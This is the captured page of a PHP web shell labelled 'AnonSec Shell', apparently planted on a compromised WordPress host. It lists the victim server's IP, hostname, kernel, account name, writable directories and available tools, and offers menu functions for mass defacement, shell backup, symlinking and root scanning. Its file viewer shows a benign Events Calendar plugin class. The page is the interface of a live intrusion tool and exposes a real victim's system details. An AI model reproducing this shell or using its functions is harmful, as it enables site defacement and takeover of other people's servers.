. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.216.168   [ Reverse IP ]
Web Server : Apache
System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : eticmes ( 123698)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/eticmes/www/wp-content/plugins/the-events-calendar/src/Tribe/Event_Tickets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/eticmes/www/wp-content/plugins/the-events-calendar/src/Tribe/Event_Tickets/Main.php
<?php
/**
 * The Events Calendar integration with Event Tickets class
 *
 * @package The Events Calendar
 * @subpackage Event Tickets
 * @since 4.0.1
 */
class Tribe__Events__Event_Tickets__Main {
	/**
	 * Private variable holding the class instance
	 *
	 * @since 4.0.1
	 *
	 * @var Tribe__Events__Event_Tickets__Main
	 */
	private static $instance;

	/**
	 * Contains an instance of the Attendees Report integration class
	 *
	 * @since 4.0.1
	 *
	 * @var Tribe__Events__Event_Tickets__Attendees_Report
	 */
	private $attendees_report;

	/**
	 * Contains an instance of the Ticket Email integration class
	 *
	 * @since 4.0.2
	 *
	 * @var Tribe__Events__Event_Tickets__Ticket_Email
	 */
	private $ticket_email;

	/**
	 * Method to return the private instance of the class
	 *
	 * @since 4.0.1
	 *
	 * @return Tribe__Events__Event_Tickets__Main
	 */
	public static function instance() {
		if ( ! self::$instance ) {
			self::$instance = new self;
		}

		return self::$instance;
	}

	/**
	 * Constructor
	 */
	public function __construct() {
		$this->attendees_report();
		$this->ticket_email();
	}

	/**
	 * Attendees Report integration class object accessor method
	 *
	 * @since 4.0.1
	 *
	 * @param object $object Override Attendees Report object
	 * @return Tribe__Events__Event_Tickets__Attendees_Report
	 */
	public function attendees_report( $object = null ) {
		if ( $object ) {
			$this->attendees_report = $object;
		} elseif ( ! $this->attendees_report ) {
			$this->attendees_report = new Tribe__Events__Event_Tickets__Attendees_Report;
		}

		return $this->attendees_report;
	}

	/**
	 * Ticket email integration class object accessor method
	 *
	 * @since 4.0.2
	 *
	 * @param object $object Override Ticket Email object
	 * @return Tribe__Events__Event_Tickets__Ticket_Email
	 */
	public function ticket_email( $object = null ) {
		if ( $object ) {
			$this->ticket_email = $object;
		} elseif ( ! $this->ticket_email ) {
			$this->ticket_email = new Tribe__Events__Event_Tickets__Ticket_Email;
		}

		return $this->ticket_email;
	}
}

Anon7 - 2022
AnonSec Team